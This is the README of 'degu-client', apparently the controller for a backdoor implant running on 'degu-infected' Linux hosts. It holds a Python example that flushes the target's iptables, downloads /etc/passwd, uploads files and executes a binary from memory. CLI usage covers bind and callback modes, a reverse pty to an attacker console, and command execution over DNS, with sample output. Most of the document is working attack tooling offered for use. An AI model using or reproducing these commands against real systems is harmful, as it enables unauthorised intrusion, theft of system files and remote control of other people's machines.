io-tl/degu-client

degu-client

degu client part

The Python API is still in early development. The library uses only the Python 3 standard library, but the dgu utility requires the docopt module (pip install docopt).

Main API

degu.py is the Python module used to interact with degu.so. An example using the main API:

#!/usr/bin/env python3
import degu
import time

PRIVATE_KEY="f82876e92eaadc0702c16e7deca02ffe25116e84c8ba1e9ebb7423446dbae0534700b14ed3e531a3bc90f852b812df7d79e55190f60c9f2dc6fc0dc67aed0e92"

d = degu.degu("192.168.0.39",priv=PRIVATE_KEY)
d.ghost_exec(b"iptables -P INPUT ACCEPT")
d.ghost_exec(b"iptables -F")

d.knock(b":2222")
time.sleep(2)
aa=d.download(b"/etc/passwd")
print(aa)

d.knock(b":2222")
time.sleep(2)
aa=d.upload(b"/tmp/a",b"/tmp/pwned")

d.knock(b":2222")
time.sleep(2)
aa=d.mem_exec("../helper/cb",b"DEGU 192.168.0.39 11111 ")

dgu utility

Usage:
    dgu bind  <rhost> <rport>         read     <rfile>
    dgu bind  <rhost> <rport>         download <rfile> <lfile>
    dgu bind  <rhost> <rport>         upload   <lfile> <rfile>
    dgu bind  <rhost> <rport>         exe      <lfile> <parameters>
    dgu cb    <rhost> <lhost> <lport> read     <rfile>
    dgu cb    <rhost> <lhost> <lport> download <rfile> <lfile>
    dgu cb    <rhost> <lhost> <lport> upload   <lfile> <rfile>
    dgu cb    <rhost> <lhost> <lport> exe      <lfile> <parameters>
    dgu ghost <rhost> <cmd>
    dgu keygen
    dgu getpub

Examples:

    Upload the local file /tmp/dd to remote /tmp/upped on the degu-infected
    host 192.168.0.49, asking it to open port 12345 for a bind connection:

$ dgu bind 192.168.0.49 12345 upload /tmp/dd /tmp/upped
[    INFO  14:11.57][degu ]: trying remote bind on 192.168.0.49:12345
[    INFO  14:11.59][degu ]: uploaded /tmp/dd on 192.168.0.49:12345:/tmp/upped

    Read the remote /etc/passwd file, asking degu to wait on port 9991 for the connection:

$ dgu bind 192.168.0.49 9991 read /etc/passwd
[    INFO  14:11.15][degu ]: trying remote bind on 192.168.0.49:9991
[    INFO  14:11.17][degu ]: downloading b'/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

    Execute a reverse pty on lhost 192.168.0.15:11111 using cb (don't forget arg0!).
    On the attacker console:

$ dgu bind 192.168.0.49 12311 exe helpers/cb "MYPROC 192.168.0.15 11111"
[    INFO  14:51.00][degu ]: trying remote bind on 192.168.0.49:12311
[    INFO  14:51.03][degu ]: send bin ok
[    INFO  14:51.03][degu ]: launch exe helpers/cb on 192.168.0.49

    Execute over unfiltered DNS:

$ dgu ghost 192.168.0.49 "touch /tmp/pwneeee"
[    INFO  18:58.45][degu ]: ghost executing b'touch /tmp/pwneeee'
[   DEBUG  18:58.45][degu ]: executing : b'touch /tmp/pwneeee'
